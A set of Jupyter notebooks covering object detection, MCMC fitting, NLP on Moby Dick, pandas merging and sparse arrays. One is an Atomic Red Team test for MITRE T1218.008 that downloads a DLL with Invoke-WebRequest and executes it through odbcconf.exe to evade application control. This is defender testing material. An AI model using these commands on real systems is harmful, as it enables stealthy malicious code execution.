tf.cast(detection_masks_reframed > 0.5, tf.uint8) output_dict['detection_masks_reframed'] = detection_masks_reframed.numpy() return output_dict # + id="XGm0B3o1RK3Y" import cv2 cap = cv2.VideoCapture(0) # or cap = cv2.VideoCapture("<video-path>") def run_inference(model, cap): while cap.isOpened(): ret, image_np = cap.read() # Actual detection. output_dict = run_inference_for_single_image(model, image_np) # Visualization of the results of a detection. vis_util.visualize_boxes_and_labels_on_image_array( image_np, output_dict['detection_boxes'], output_dict['detection_classes'], output_dict['detection_scores'], category_index, instance_masks=output_dict.get('detection_masks_reframed', None), use_normalized_coordinates=True, line_thickness=8) cv2.imshow('object_detection', cv2.resize(image_np, (800, 600))) if cv2.waitKey(25) & 0xFF == ord('q'): cap.release() cv2.destroyAllWindows() break run_inference(detection_model, cap) # + id="6w5hwVbxVqaP" # + colab={"base_uri": "https://localhost:8080/", "height": 128} id="0IsQPQtgVHrw" outputId="a2fdf553-2a63-4302-8c6c-d0cc49e8ecaf" python vehicle_counting.py # + id="bp3WDTgTWUiE"
object_detection_training.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # %pylab inline import matplotlib.pyplot as plt import numpy as np # + alph=0.1 bet=2 log_R_c=np.log(1) log_rho0=np.log(30) r=linspace(-10,10,1000) def densities(alph,bet,log_R_c,log_rho0,r): rho=np.exp(log_rho0)/(((np.exp(r)/np.exp(log_R_c))**alph)*((1+np.exp(r)/np.exp(log_R_c))**bet)) return (rho) densdata=densities(alph,bet,log_R_c,log_rho0,r) scatter(r,np.log(densdata)) # - def loglikelihood(y_obs, y_model): chi_squared = (1.0/2.0)*sum((y_obs-y_model)**2) return (-chi_squared) # + densmodel=[] alph_walk = empty((0)) bet_walk = empty((0)) log_R_c_walk = empty((0)) log_rho0_walk = empty((0)) logl_walk = empty((0)) alph0=0.19 bet0=2.12 log_R_c0=np.log(1.099) log_rho00=np.log(31) alph_walk = append(alph_walk, alph0) bet_walk = append(bet_walk, bet0) log_R_c_walk = append(log_R_c_walk, log_R_c0) log_rho0_walk = append(log_rho0_walk, log_rho00) densmodel = densities(alph_walk[0],bet_walk[0],log_R_c_walk[0],log_rho0_walk[0],r) logl_walk = append(logl_walk, loglikelihood(densdata, densmodel)) print 'Los parámetros iniciales fueron' print 'alph0='+str(alph_walk[0]) print 'bet0='+str(bet_walk[0]) print 'R_c0='+str(log_R_c_walk[0]) print 'rho00='+str(log_rho0_walk[0]) print 'El logaritmo de la función de likelihood es='+str(logl_walk[0]) # - n_iterations = 10000 densprime=[] for i in range(n_iterations): alph0_prime = np.random.normal(alph_walk[i], 1) bet0_prime = np.random.normal(bet_walk[i], 1) log_R_c0_prime = np.random.normal(log_R_c_walk[i], 1) log_rho00_prime = np.random.normal(log_rho0_walk[i], 1) densmodel = densities(alph_walk[i],bet_walk[i],log_R_c_walk[i],log_rho0_walk[i],r) densprime = densities(alph0_prime,bet0_prime,log_R_c0_prime,log_rho00_prime,r) logl_prime = loglikelihood(densdata, densprime) logl_init = loglikelihood(densdata, densmodel) alpha = exp(logl_prime-logl_init) if(alpha>=1.0): alph_walk = append(alph_walk,alph0_prime) bet_walk = append(bet_walk,bet0_prime) log_R_c_walk = append(log_R_c_walk,log_R_c0_prime) log_rho0_walk = append(log_rho0_walk,log_rho00_prime) logl_walk = append(logl_walk, logl_prime) else: beta = random.random() if(beta<=alpha): alph_walk = append(alph_walk,alph0_prime) bet_walk = append(bet_walk,bet0_prime) log_R_c_walk = append(log_R_c_walk,log_R_c0_prime) log_rho0_walk = append(log_rho0_walk,log_rho00_prime) logl_walk = append(logl_walk, logl_prime) else: alph_walk = append(alph_walk,alph_walk[i]) bet_walk = append(bet_walk,bet_walk[i]) log_R_c_walk = append(log_R_c_walk,log_R_c_walk[i]) log_rho0_walk = append(log_rho0_walk,log_rho0_walk[i]) logl_walk = append(logl_walk, logl_init) count, bins, ignored =plt.hist(alph_walk, 20, normed=True) plt.title('Histograma de alpha', fontsize=12) count, bins, ignored =plt.hist(bet_walk, 20, normed=True) plt.title('Histograma de beta', fontsize=12) count, bins, ignored =plt.hist(log_R_c_walk, 20, normed=True) plt.title('Histograma de log_R_c', fontsize=12) count, bins, ignored =plt.hist(log_rho0_walk, 20, normed=True) plt.title('Histograma de log_rho0', fontsize=12) Plot2=plt.figure(figsize=(10,10)) plot((logl_walk)) plt.title('Evolucion de funcion de error de $\chi^{2}$', fontsize=12) plt.grid() # + max_likelihood_id = argmax(logl_walk) best_alph = alph_walk[max_likelihood_id] best_bet = bet_walk[max_likelihood_id] best_log_R_c = log_R_c_walk[max_likelihood_id] best_log_rho0 = log_rho0_walk[max_likelihood_id] print 'Los parámetros más probables encontrados fueron' print 'alph='+str(best_alph) print 'bet='+str(best_bet) print 'log_R_c='+str(best_log_R_c) print 'log_rho0='+str(best_log_rho0) print '\nLos parámetros originales fueron' print 'alph='+str(alph) print 'bet='+str(bet) print 'log_R_c='+str(log_R_c) print 'log_rho0='+str(log_rho0) # - denstest=[] denstest=densities(best_alph,best_bet,best_log_R_c,best_log_rho0,r) densdata=densities(alph,bet,log_R_c,log_rho0,r) scatter(np.log(r),np.log(densdata)) scatter(np.log(r),np.log(denstest))
.ipynb_checkpoints/MCMC-checkpoint.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Frequencies of words in novels: a Data Science pipeline # <img src="img/moby-dick.jpg" width="350"> # In this code-along session, you will use some basic Natural Language Processing to plot the most frequently occurring words in the novel _<NAME>_. In doing so, you'll also see the efficacy of thinking in terms of the following Data Science pipeline with a constant regard for process: # 1. State your question; # 2. Get your data; # 3. Wrangle your data to answer your question; # 4. Answer your question; # 5. Present your solution so that others can understand it. # # For example, what would the following word frequency distribution be from? # # <img src="img/d-x.png" width="350"> # ## Pre-steps # # Follow the instructions in the README.md to get your system set up and ready to go. # ## 1. State your question # # What are the most frequent words in the novel _Moby Dick_ and how often do they occur? # ## 2. Get your data # Your raw data is the text of Melville's novel _Moby Dick_. We can find it at [Project Gutenberg](https://www.gutenberg.org/). # # **TO DO:** Head there, find _Moby Dick_ and then store the relevant url in your Python namespace: # Store url url = 'https://www.gutenberg.org/files/2701/2701-h/2701-h.htm' # # You're going to use [`requests`](http://docs.python-requests.org/en/master/) to get the web data. # You can find out more in DataCamp's [Importing Data in Python (Part 2) course](https://www.datacamp.com/courses/importing-data-in-python-part-2). # # <img src="img/requests.png" width="200"> # # According to the `requests` package website: # # > Requests is one of the most downloaded Python packages of all time, pulling in over 13,000,000 downloads every month. All the cool kids are doing it! # # You'll be making a `GET` request from the website, which means you're _getting_ data from it. `requests` make this easy with its `get` function. # # **TO DO:** Make the request here and check the object type returned. # + # Import `requests` import requests # Make the request and check object type r = requests.get(url) type(r) # - # This is a `Response` object. You can see in the [`requests` kickstart guide](http://docs.python-requests.org/en/master/user/quickstart/) that a `Response` object has an attribute `text` that allows you to get the HTML from it! # # **TO DO:** Get the HTML and print the HTML to check it out: # Extract HTML from Response object and print html = r.text #print(html) # OK! This HTML is not quite what you want. However, it does _contain_ what you want: the text of _Moby Dick_. What you need to do now is _wrangle_ this HTML to extract the novel. # **Recap:** # # * you have now scraped the web to get _Moby Dick_ from Project Gutenberg. # # **Up next:** it's time for you to parse the html and extract the text of the novel. # ## 3. Wrangle your data to answer the question # ### Part 1: getting the text from the HTML # # Here you'll use the package [`BeautifulSoup`](https://www.crummy.com/software/BeautifulSoup/). The package website says: # # <img src="img/bs4.png" width="550"> # # # **TO DO:** Create a `BeautifulSoup` object from the HTML. # + # Import BeautifulSoup from bs4 from bs4 import BeautifulSoup # Create a BeautifulSoup object from the HTML soup = BeautifulSoup(html, "html5lib") type(soup) # - # From these soup objects, you can extract all types of interesting information about the website you're scraping, such as title: # Get soup title soup.title # Or the title as a string: # Get soup title as string soup.title.string # Or all URLs found within a page’s < a > tags (hyperlinks): # Get hyperlinks from soup and check out first 10 soup.findAll('a')[:8] # What you want to do is to extract the text from the `soup` and there's a souper helpful `.get_text()` method precisely for this. # # **TO DO:** Get the text, print it out and have a look at it. Is it what you want? # Get the text out of the soup and print it text = soup.get_text() #print(text) # Notice that this is now nearly what you want. You'll need to do a bit more work. # **Recap:** # # * you have scraped the web to get _Moby Dick_ from Project Gutenberg; # * you have also now parsed the html and extracted the text of the novel. # # **Up next:** you'll use Natural Language Processing, tokenization and regular expressions to extract the list of words in _Moby Dick_. # ### Part 2: Extract words from your text using NLP # You'll now use `nltk`, the Natural Language Toolkit, to # # 1. Tokenize the text (fancy term for splitting into tokens, such as words); # 2. Remove stopwords (words such as 'a' and 'the' that occur a great deal in ~ nearly all English language texts. # # #### Step 1: Tokenize # # You want to tokenize your text, that is, split it into a list a words. # # To do this, you're going to use a powerful tool called _regular expressions_, or _regex_. # # * Example: you have the string '<NAME> picked a peck of pickled peppers' and you want to extract from the list of _all_ words in it that start with a 'p'. # # The regular expression that matches all words beginning with 'p' is 'p\w+'. Let's unpack this: # # * the 'p' at the beginning of the regular expression means that you'll only match sequences of characters that start with a 'p'; # * the '\w' is a special character that will match any alphanumeric A-Z, a-z, 0-9, along with underscores; # * The '+' tells you that the previous character in the regex can appear as many times as you want in strings that you're trying to match. This means that '\w+' will match arbitrary sequences of alphanumeric characters and underscores. # # **You'll now use the built-in Python package `re` to extract all words beginning with 'p' from the sentence '<NAME> picked a peck of pickled peppers' as a warm-up.** # # # + # Import regex package import re # Define sentence sentence = 'peter piper pick a peck of pickled peppers' # Define regex ps = 'p\w+' # Find all words in sentence that match the regex and print them re.findall(ps, sentence) # - # This looks pretty good. Now, if 'p\w+' is the regex that matches words beginning with 'p', what's the regex that matches all words? # # **It's your job to now do this for our toy Peter Piper sentence above.** # Find all words and print them re.findall('\w+', sentence) # **TO DO:** use regex to get all the words in _Moby Dick_: # Find all words in Moby Dick and print several tokens = re.findall('\w+', text) tokens[:8] # **Recap:** # # * you have scraped the web to get _Moby Dick_ from Project Gutenberg; # * you have parsed the html and extracted the text of the novel; # * you have used tokenization and regular expressions to extract the list of words in _Moby Dick_. # # **Up next:** extract the list of words in _Moby Dick_ using `nltk`, the Natural Language Toolkit. # # Go get it! # + # Import RegexpTokenizer from nltk.tokenize from nltk.tokenize import RegexpTokenizer # Create tokenizer tokenizer = RegexpTokenizer('\w+') # Create tokens tokens = tokenizer.tokenize(text) tokens[:8] # - # **TO DO:** Create a list containing all the words in _Moby Dick_ such that all words contain only lower case letters. You'll find the string method `.lower()` handy: # + # Initialize new list words = [] # Loop through list tokens and make lower case for word in tokens: words.append(word.lower()) # Print several items from list as sanity check words[:8] # - # **Recap:** # # * you have scraped the web to get _Moby Dick_ from Project Gutenberg; # * you have parsed the html and extracted the text of the novel; # * you have used tokenization and regular expressions to extract the list of words in _Moby Dick_. # # **Up next:** remove common words such as 'a' and 'the' from the list of words. # #### Step 2: Remove stop words # # It is common practice to remove words that appear alot in the English language such as 'the', 'of' and 'a' (known as stopwords) because they're not so interesting. For more on all of these techniques, check out our [Natural Language Processing Fundamentals in Python course](https://www.datacamp.com/courses/nlp-fundamentals-in-python). # # The package `nltk` has a list of stopwords in English which you'll now store as `sw` and print the first several elements of. # # If you get an error here, run the command `nltk.download('stopwords')` to install the stopwords on your system. # + # Import nltk import nltk # Get English stopwords and print some of them sw = nltk.corpus.stopwords.words('english') sw[:5] # - # You want the list of all words in `words` that are *not* in `sw`. One way to get this list is to loop over all elements of `words` and add the to a new list if they are *not* in `sw`: # + # Initialize new list words_ns = [] # Add to words_ns all words that are in words but not in sw for word in words: if word not in sw: words_ns.append(word) # Print several list items as sanity check words_ns[:5] # - # **Recap:** # # * you have scraped the web to get _Moby Dick_ from Project Gutenberg; # * you have parsed the html and extracted the text of the novel; # * you have used tokenization and regular expressions to extract the list of words in _Moby Dick_. # * you have removed common words such as 'a' and 'the' from the list of words. # # **Up next:** plot the word frequency distribution of words in _Moby Dick_. # ## 4. Answer your question # # # Our question was 'What are the most frequent words in the novel Moby Dick and how often do they occur?' # # You can now plot a frequency distribution of words in _Moby Dick_ in two line of code using `nltk`. To do this, # # * Create a frequency distribution object using the function `nltk.FreqDist()`; # * Using the plot method of the resulting object. # + #Import datavis libraries import matplotlib.pyplot as plt import seaborn as sns # Figures inline and set visualization style # %matplotlib inline sns.set() # Create freq dist and plot freqdist1 = nltk.FreqDist(words_ns) freqdist1.plot(25) # - # **Recap:** # # * you have scraped the web to get _Moby Dick_ from Project Gutenberg; # * you have parsed the html and extracted the text of the novel; # * you have used tokenization and regular expressions to extract the list of words in _<NAME>_. # * you have removed common words such as 'a' and 'the' from the list of words. # * you have plotted the word frequency distribution of words in _Moby Dick_. # # **Up next:** adding more stopwords. # ### Add more stop words # + # Import stopwords from sklearn from sklearn.feature_extraction.stop_words import ENGLISH_STOP_WORDS # Add sklearn stopwords to words_sw sw = set(sw + list(ENGLISH_STOP_WORDS)) # Initialize new list words_ns = [] # Add to words_ns all words that are in words but not in sw for word in words: if word not in sw: words_ns.append(word) # Create freq dist and plot freqdist2 = nltk.FreqDist(words_ns) freqdist2.plot(25) # - # ## 5. Present your solution so that others can understand it. # # The cool thing is that, in using `nltk` to answer our question, we actually already presented our solution in a manner that can be communicated to other: a frequency distribution plot! You can read off the most common words, along with their frequency. For example, 'whale' is the most common word in the novel (go figure), excepting stopwords, and it occurs a whopping >1200 times! # ___ # ## BONUS MATERIAL # As you have seen that there are lots of novels on Project Gutenberg we can make these word frequency distributions of, it makes sense to write your own function that does all of this: def plot_word_freq(url): """Takes a url (from Project Gutenberg) and plots a word frequency distribution""" # Make the request and check object type r = requests.get(url) # Extract HTML from Response object and print html = r.text # Create a BeautifulSoup object from the HTML soup = BeautifulSoup(html, "html5lib") # Get the text out of the soup and print it text = soup.get_text() # Create tokenizer tokenizer = RegexpTokenizer('\w+') # Create tokens tokens = tokenizer.tokenize(text) # Initialize new list words = [] # Loop through list tokens and make lower case for word in tokens: words.append(word.lower()) # Get English stopwords and print some of them sw = nltk.corpus.stopwords.words('english') # Initialize new list words_ns = [] # Add to words_ns all words that are in words but not in sw for word in words: if word not in sw: words_ns.append(word) # Create freq dist and plot freqdist1 = nltk.FreqDist(words_ns) freqdist1.plot(25) # Now use the function to plot word frequency distributions from other texts on Project Gutenberg: # # * Pride and Prejudice plot_word_freq('https://www.gutenberg.org/files/42671/42671-h/42671-h.htm') # * <NAME> plot_word_freq('https://www.gutenberg.org/files/521/521-h/521-h.htm') # * The King James Bible plot_word_freq('https://www.gutenberg.org/files/10/10-h/10-h.htm')
NLP_FB_live_coding_soln.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Merging and Concatenating Dataframes # # # In this section, you will merge and concatenate multiple dataframes. Merging is one of the most common operations you will do, since data often comes in various files. # # In our case, we have sales data of a retail store spread across multiple files. We will now work with all these data files and learn to: # * Merge multiple dataframes using common columns/keys using ```pd.merge()``` # * Concatenate dataframes using ```pd.concat()``` # # Let's first read all the data files. # + # loading libraries and reading the data import numpy as np import pandas as pd market_df = pd.read_csv("./global_sales_data/market_fact.csv") customer_df = pd.read_csv("./global_sales_data/cust_dimen.csv") product_df = pd.read_csv("./global_sales_data/prod_dimen.csv") shipping_df = pd.read_csv("./global_sales_data/shipping_dimen.csv") orders_df = pd.read_csv("./global_sales_data/orders_dimen.csv") # - # ### Merging Dataframes Using ```pd.merge()``` # # There are five data files: # 1. The ```market_fact``` table contains the sales data of each order # 2. The other 4 files are called 'dimension tables/files' and contain metadata about customers, products, shipping details, order details etc. # # If you are familiar with star schemas and data warehouse designs, you will note that we have one fact table and four dimension tables. # # Already familiar with market data: Each row is an order market_df.head() # Customer dimension table: Each row contains metadata about customers customer_df.head() # Product dimension table product_df.head() # Shipping metadata shipping_df.head() # Orders dimension table orders_df.head() # ### Merging Dataframes # # Say you want to select all orders and observe the ```Sales``` of the customer segment *Corporate*. Since customer segment details are present in the dataframe ```customer_df```, we will first need to merge it with ```market_df```. # # Merging the dataframes # Note that Cust_id is the common column/key, which is provided to the 'on' argument # how = 'inner' makes sure that only the customer ids present in both dfs are included in the result df_1 = pd.merge(market_df, customer_df, how='inner', on='Cust_id') df_1.head() # Now, you can subset the orders made by customers from 'Corporate' segment df_1.loc[df_1['Customer_Segment'] == 'CORPORATE', :] # + # Example 2: Select all orders from product category = office supplies and from the corporate segment # We now need to merge the product_df df_2 = pd.merge(df_1, product_df, how='inner', on='Prod_id') df_2.head() # - # Select all orders from product category = office supplies and from the corporate segment df_2.loc[(df_2['Product_Category']=='OFFICE SUPPLIES') & (df_2['Customer_Segment']=='CORPORATE'),:] # # Similary, you can merge the other dimension tables - ```shipping_df``` and ```orders_df``` to create a ```master_df``` and perform indexing using any column in the master dataframe. # # Merging shipping_df df_3 = pd.merge(df_2, shipping_df, how='inner', on='Ship_id') df_3.shape # Merging the orders table to create a master df master_df = pd.merge(df_3, orders_df, how='inner', on='Ord_id') master_df.shape master_df.head() # Similary, you can perform left, right and outer merges (joins) by using the argument ```how = 'left' / 'right' / 'outer'```. # ### Concatenating Dataframes # # Concatenation is much more straightforward than merging. It is used when you have dataframes having the same columns and want to append them (pile one on top of the other), or having the same rows and want to append them side-by-side. # # #### Concatenating Dataframes Having the Same columns # # Say you have two dataframes having the same columns, like so: # + # dataframes having the same columns df1 = pd.DataFrame({'Name': ['Aman', 'Joy', 'Rashmi', 'Saif'], 'Age': ['34', '31', '22', '33'], 'Gender': ['M', 'M', 'F', 'M']} ) df2 = pd.DataFrame({'Name': ['Akhil', 'Asha', 'Preeti'], 'Age': ['31', '22', '23'], 'Gender': ['M', 'F', 'F']} ) df1 # - df2 # To concatenate them, one on top of the other, you can use pd.concat # The first argument is a sequence (list) of dataframes # axis = 0 indicates that we want to concat along the row axis pd.concat([df1, df2], axis = 0) # A useful and intuitive alternative to concat along the rows is the append() function # It concatenates along the rows df1.append(df2) # #### Concatenating Dataframes Having the Same Rows # # You may also have dataframes having the same rows but different columns (and having no common columns). In this case, you may want to concat them side-by-side. For e.g.: df1 = pd.DataFrame({'Name': ['Aman', 'Joy', 'Rashmi', 'Saif'], 'Age': ['34', '31', '22', '33'], 'Gender': ['M', 'M', 'F', 'M']} ) df1 df2 = pd.DataFrame({'School': ['RK Public', 'JSP', '<NAME>', '<NAME>'], 'Graduation Marks': ['84', '89', '76', '91']} ) df2 # To join the two dataframes, use axis = 1 to indicate joining along the columns axis # The join is possible because the corresponding rows have the same indices pd.concat([df1, df2], axis = 1) # Note that you can also use the ```pd.concat()``` method to merge dataframes using common keys, though here we will not discuss that. For simplicity, we have used the ```pd.merge()``` method for database-style merging and ```pd.concat()``` for appending dataframes having no common columns. # #### Performing Arithmetic Operations on two or more dataframes # # We can also perform simple arithmetic operations on two or more dataframes. Below are the stats for IPL 2018 and 2017. # + # Teamwise stats for IPL 2018 IPL_2018 = pd.DataFrame({'IPL Team': ['CSK', 'SRH', 'KKR', 'RR', 'MI', 'RCB', 'KXIP', 'DD'], 'Matches Played': [16, 17, 16, 15, 14, 14, 14, 14], 'Matches Won': [11, 10, 9, 7, 6, 6, 6, 5]} ) # Set the 'IPL Team' column as the index to perform arithmetic operations on the other rows using the team as reference IPL_2018.set_index('IPL Team', inplace = True) IPL_2018 # - # Similarly, we have the stats for IPL 2017 IPL_2017 = pd.DataFrame({'IPL Team': ['MI', 'RPS', 'KKR', 'SRH', 'KXIP', 'DD', 'GL', 'RCB'], 'Matches Played': [17, 16, 16, 15, 14, 14, 14, 14], 'Matches Won': [12, 10, 9, 8, 7, 6, 4, 3]} ) IPL_2017.set_index('IPL Team', inplace = True) IPL_2017 # + # Simply add the two DFs using the add opearator Total = IPL_2018 + IPL_2017 Total # - # Notice that there are a lot of NaN values. This is because some teams which played in IPL 2017 were not present in IPL 2018. In addition, there were also new teams present in IPL 2018. We can handle these NaN values by using `df.add()` instead of the simple add operator. Let's see how. # The fill_value argument inside the df.add() function replaces all the NaN values in the two dataframes w.r.t. each other with zero. Total = IPL_2018.add(IPL_2017, fill_value = 0) Total # Also notice how the resultant dataframe is sorted by the index, i.e. 'IPL Team' alphabetically. # + # Creating a new column - 'Win Percentage' Total['Win Percentage'] = Total['Matches Won']/Total['Matches Played'] Total # + # Sorting to determine the teams with most number of wins. If the number of wins of two teams are the same, sort by the win percentage. Total.sort_values(by = (['Matches Won', 'Win Percentage']), ascending = False) # - # Apart from add(), there are also other operator-equivalent mathematical functions that you can use on Dataframes. Below is a list of all the functions that you can use to perform operations on two or more dataframes # - `add()`: + # - `sub()`: - # - `mul()`: * # - `div()`: / # - `floordiv()`: // # - `mod()`: % # - `pow()`: **
5__Merging_Concatenating.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .ps1 # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: .NET (PowerShell) # language: PowerShell # name: .net-powershell # --- # # T1218.008 - Signed Binary Proxy Execution: Odbcconf # Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft. # # Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a <code>REGSVR</code> flag that can be misused to execute DLLs (ex: <code>odbcconf.exe /S /A &lbrace;REGSVR "C:\Users\Public\file.dll"&rbrace;</code>). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) # # ## Atomic Tests #Import the Module before running the tests. # Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts. Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force # ### Atomic Test #1 - Odbcconf.exe - Execute Arbitrary DLL # Execute arbitrary DLL file stored locally. # # **Supported Platforms:** windows # #### Dependencies: Run with `powershell`! # ##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) # # ##### Check Prereq Commands: # ```powershell # if (Test-Path PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll) {exit 0} else {exit 1} # # ``` # ##### Get Prereq Commands: # ```powershell # New-Item -Type Directory (split-path PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll) -ErrorAction ignore | Out-Null # Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll" # # ``` Invoke-AtomicTest T1218.008 -TestNumbers 1 -GetPreReqs # #### Attack Commands: Run with `command_prompt` # ```command_prompt # odbcconf.exe /S /A {REGSVR "PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll"} # ``` Invoke-AtomicTest T1218.008 -TestNumbers 1 # ## Detection # Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.
playbook/tactics/defense-evasion/T1218.008.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import numpy as np import sparse import scipy.sparse as ss from GCRS2 import CSR,CSC # The csr/csc arrays shown here are loosely based on the GCRS/GCCS formats presented in [Shaikh et al. 2015](https://ieeexplore.ieee.org/document/7237032). However, I've used a different linearization function where the first half of the axes represent the rows of the underlying sparse matrix and the remaining axes represent the columns. This is in line with numpy's reshape method. In general the compression ratio does not change much as additional dimensions are added to csr/csc and consequently offers much better compression than coo. In principle it should be possible to use these arrays in any place that expects the numpy ndarray API and also anything that works with scipy.sparse matrices. Dask, scikit-learn, and xarray are all good candidates for this. Currently, csr/csc is much faster than coo for indexing 2d arrays, as should be the case. For arrays with more dimensions, the runtime is a bit longer because there are the additional steps of transforming nd-coords to 2d-coords and sometimes a last step of transforming coordinates afterwards. With a few algorithmic improvements and possibly compiling these other steps with numba I suspect that csr/csc will be faster than coo. The csc indexing still has some bugs that I'm working out but csr should mostly work. 1d arrays don't make a ton of sense for csr/csc and it might be best to return a 1d coo array when returning anything 1d. I'm not sure about that though. This codebase is very young and most everything is likely to change. I'm hoping that when it is ready, this code might be merged with pydata/sparse. from GCRS2.convert2 import uncompress_dimension def assert_eq(csr,coo): coords = np.vstack((uncompress_dimension(csr.indptr,csr.indices),csr.indices)) assert np.array_equal(coords, coo.reshape(csr.compressed_shape).coords) assert np.array_equal(csr.data, coo.data) coo = sparse.random((10,10,10),density=.2) csr = CSR(coo) assert_eq(csr,coo) # # Indexing # I think there are still a few bugs here and there but a fair amount works. # # - for 2d scipy is still much faster assert_eq(csr[:5,:5,:5],coo[:5,:5,:5]) assert_eq(csr[0,:5,:5],coo[0,:5,:5]) assert_eq(csr[:5,0,:5],coo[:5,0,:5]) assert_eq(csr[:5,:5,0],coo[:5,:5,0]) assert_eq(csr[:5,np.arange(5),0],coo[:5,np.arange(5),0]) coo = sparse.random((1000,1000),density=.2) csr = CSR(coo) scipy_test = coo.tocsr() # %timeit scipy_test[:800,:800] # %timeit csr[:800,:800] # %timeit coo[:800,:800] # # 3D coo = sparse.random((100,100,100),density=.2) csr = CSR(coo) # %timeit csr[:80,:50,:90] # %timeit coo[:80,:50,:90] # # 4D coo = sparse.random((100,100,100,100),density=.2) csr = CSR(coo) # %timeit csr[:80,:80,:80,:80] # %timeit coo[:80,:80,:80,:80] # # Compression # # 2D Density of .2 and .01 #create random sparse array coo = sparse.random((100,100),density=.2) dense = coo.todense() csr = CSR(coo) csc = CSC(coo) print('no. bytes dense: ',dense.nbytes,' storage ratio: ', dense.nbytes/dense.nbytes) print('no. bytes coo: ',coo.nbytes, ' storage ratio: ', coo.nbytes/dense.nbytes) print('no. bytes csr: ',csr.nbytes,' storage ratio: ', csr.nbytes/dense.nbytes) print('no. bytes csc: ',csc.nbytes,' storage ratio: ', csc.nbytes/dense.nbytes) #create random sparse array coo = sparse.random((100,100),density=.01) dense = coo.todense() csr = CSR(coo) csc = CSC(coo) print('no. bytes dense: ',dense.nbytes,' storage ratio: ', dense.nbytes/dense.nbytes) print('no. bytes coo: ',coo.nbytes, ' storage ratio: ', coo.nbytes/dense.nbytes) print('no. bytes csr: ',csr.nbytes,' storage ratio: ', csr.nbytes/dense.nbytes) print('no. bytes csc: ',csc.nbytes,' storage ratio: ', csc.nbytes/dense.nbytes) # # 3D Density of .2 and .01 #create random sparse array coo = sparse.random((100,100,100),density=.2) dense = coo.todense() csr = CSR(coo) csc = CSC(coo) print('no. bytes dense: ',dense.nbytes,' storage ratio: ', dense.nbytes/dense.nbytes) print('no. bytes coo: ',coo.nbytes, ' storage ratio: ', coo.nbytes/dense.nbytes) print('no. bytes csr: ',csr.nbytes,' storage ratio: ', csr.nbytes/dense.nbytes) print('no. bytes csc: ',csc.nbytes,' storage ratio: ', csc.nbytes/dense.nbytes) #create random sparse array coo = sparse.random((100,100,100),density=.01) dense = coo.todense() csr = CSR(coo) csc = CSC(coo) print('no. bytes dense: ',dense.nbytes,' storage ratio: ', dense.nbytes/dense.nbytes) print('no. bytes coo: ',coo.nbytes, ' storage ratio: ', coo.nbytes/dense.nbytes) print('no. bytes csr: ',csr.nbytes,' storage ratio: ', csr.nbytes/dense.nbytes) print('no. bytes csc: ',csc.nbytes,' storage ratio: ', csc.nbytes/dense.nbytes) # # 4D Density of .2 and .01 #create random sparse array coo = sparse.random((50,50,50,50),density=.2) dense = coo.todense() csr = CSR(coo) csc = CSC(coo) print('no. bytes dense: ',dense.nbytes,' storage ratio: ', dense.nbytes/dense.nbytes) print('no. bytes coo: ',coo.nbytes, ' storage ratio: ', coo.nbytes/dense.nbytes) print('no. bytes csr: ',csr.nbytes,' storage ratio: ', csr.nbytes/dense.nbytes) print('no. bytes csc: ',csc.nbytes,' storage ratio: ', csc.nbytes/dense.nbytes) #create random sparse array coo = sparse.random((50,50,50,50),density=.01) dense = coo.todense() csr = CSR(coo) csc = CSC(coo) print('no. bytes dense: ',dense.nbytes,' storage ratio: ', dense.nbytes/dense.nbytes) print('no. bytes coo: ',coo.nbytes, ' storage ratio: ', coo.nbytes/dense.nbytes) print('no. bytes csr: ',csr.nbytes,' storage ratio: ', csr.nbytes/dense.nbytes) print('no. bytes csc: ',csc.nbytes,' storage ratio: ', csc.nbytes/dense.nbytes) # # 5D Density of .2 and .01 #create random sparse array coo = sparse.random((15,15,15,15,15),density=.2) dense = coo.todense() csr = CSR(coo) csc = CSC(coo) print('no. bytes dense: ',dense.nbytes,' storage ratio: ', dense.nbytes/dense.nbytes) print('no. bytes coo: ',coo.nbytes, ' storage ratio: ', coo.nbytes/dense.nbytes) print('no. bytes csr: ',csr.nbytes,' storage ratio: ', csr.nbytes/dense.nbytes) print('no. bytes csc: ',csc.nbytes,' storage ratio: ', csc.nbytes/dense.nbytes) #create random sparse array coo = sparse.random((15,15,15,15,15),density=.01) dense = coo.todense() csr = CSR(coo) csc = CSC(coo) print('no. bytes dense: ',dense.nbytes,' storage ratio: ', dense.nbytes/dense.nbytes) print('no. bytes coo: ',coo.nbytes, ' storage ratio: ', coo.nbytes/dense.nbytes) print('no. bytes csr: 